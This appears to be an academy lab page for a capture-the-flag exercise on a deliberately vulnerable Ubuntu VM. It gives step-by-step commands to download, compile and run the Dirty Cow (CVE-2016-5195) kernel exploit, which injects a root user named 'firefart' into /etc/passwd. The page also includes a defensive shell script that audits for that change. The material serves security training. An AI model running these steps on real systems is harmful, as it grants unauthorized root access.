Privilege Escalation via Dirty Cow Kernel Exploit

Difficulty

  • intermediate

Average duration

2 hrs

Technologies

  • linux

  • cybersecurity

  • penetration testing

  • red team

  • kernel exploit

🌱 How to start this project?

The academy provides a virtual machine running a vulnerable version of Ubuntu Server (16.04.1) with a kernel affected by the Dirty Cow vulnerability (CVE-2016-5195).

As a student, you already have access to this system with a limited user called student. Your goal will be to identify that the system is vulnerable, compile and run a real exploit, and escalate your privileges to gain root access. This exercise simulates a realistic scenario where a local attacker, without administrative privileges, manages to fully compromise the system by exploiting a kernel vulnerability. The objectives are:

  • Check the kernel version of a Linux system.
  • Compile a real exploit using gcc.
  • Escalate privileges from a limited user to root.
  • Demonstrate the success of the attack by capturing a flag located in /root.

This type of exploitation is typical in advanced security audits and Red Team environments. It will help you connect low-level operating system concepts with real offensive techniques, in a practical and guided way.

Requirements

  • Vulnerable Ubuntu machine with kernel 4.4.0-21-generic (or similar, unpatched)
  • Access as a non-privileged user to the vulnerable machine (student:password123)

📝 Instructions

Step 1: Check the kernel version

  1. Log in to the vulnerable machine with the limited user and run:

    uname -a

    This will return something like:

    Linux dirtycow-lab 4.4.0-31-generic #50-Ubuntu SMP Tue Sep 6 15:42:33 UTC 2016 x86_64 x86_64 x86_64
  2. Note the version and research how to exploit that vulnerability using databases like Exploit-DB, GitHub, or searchsploit from Kali.

    HELP: For this exercise, we provide you with a functional and documented exploit that you can download.

Step 2: Download the exploit

  1. Use the following command to download the dirty.c file from the repository provided by the academy:

    wget https://raw.githubusercontent.com/breatheco-de/kernel-exploit-dirtycow-project/refs/heads/main/assets/dirty.c
  2. Once the file is downloaded, compile it with gcc:

    gcc dirty.c -o dirty -pthread -lcrypt

    This will generate an executable called dirty ready to run.

  3. Run the binary:

    ./dirty

    This exploit performs the following actions:

    • Creates a backup of /etc/passwd at /tmp/passwd.bak.
    • Injects a new line into /etc/passwd with a root-level user:

        username: firefart
        password: firefart
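
The two changes listed above are also what a defender can look for afterwards. The following check is an added example, not code from the academy or the exploit's author: it flags UID 0 accounts not named root and password hashes stored inline in a passwd-format file, and looks for the /tmp/passwd.bak backup. The function names, the sample file and the exact layout of the injected line are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit a passwd-format file for the changes described above.
# Function names and the sample data are constructed for illustration.

audit_passwd() {
    # $1: passwd-format file to audit (defaults to /etc/passwd)
    awk -F: '
        /^#/ || NF < 7 { next }              # skip comments and malformed lines
        $3 ~ /^0+$/ && $1 != "root" {        # UID 0 under a name other than root
            print "UID0_NOT_ROOT:" $1
        }
        $2 !~ /^(x|[*!]*)$/ {                # hash stored inline, not in /etc/shadow
            print "HASH_IN_PASSWD:" $1
        }
    ' "${1:-/etc/passwd}"
}

check_backup_artifact() {
    # $1: backup path to look for (defaults to the path named on this page)
    path="${1:-/tmp/passwd.bak}"
    if [ -e "$path" ]; then
        echo "BACKUP_PRESENT:$path"
    fi
}

sample_passwd() {
    # Constructed sample: three ordinary entries plus an injected UID 0 line
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
student:x:1000:1000:,,,:/home/student:/bin/bash
firefart:fiCONSTRUCTEDHASH:0:0:pwned:/root:/bin/bash
EOF
}

demo() {
    # Run the audit over the constructed sample instead of the live file
    tmp=$(mktemp) || return 1
    sample_passwd > "$tmp"
    audit_passwd "$tmp"
    rm -f "$tmp"
}

demo
```

On a live host, call audit_passwd and check_backup_artifact with no arguments to check /etc/passwd and /tmp/passwd.bak.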

Step 3: Escalate privileges

  1. Once the exploit finishes running, switch users.
  2. Verify that you now have access as root.
  3. Finally, capture the flag. To confirm the success of the attack, read the contents of the flag file located at /root/flag.txt. If everything worked correctly, you will see the flag's content.
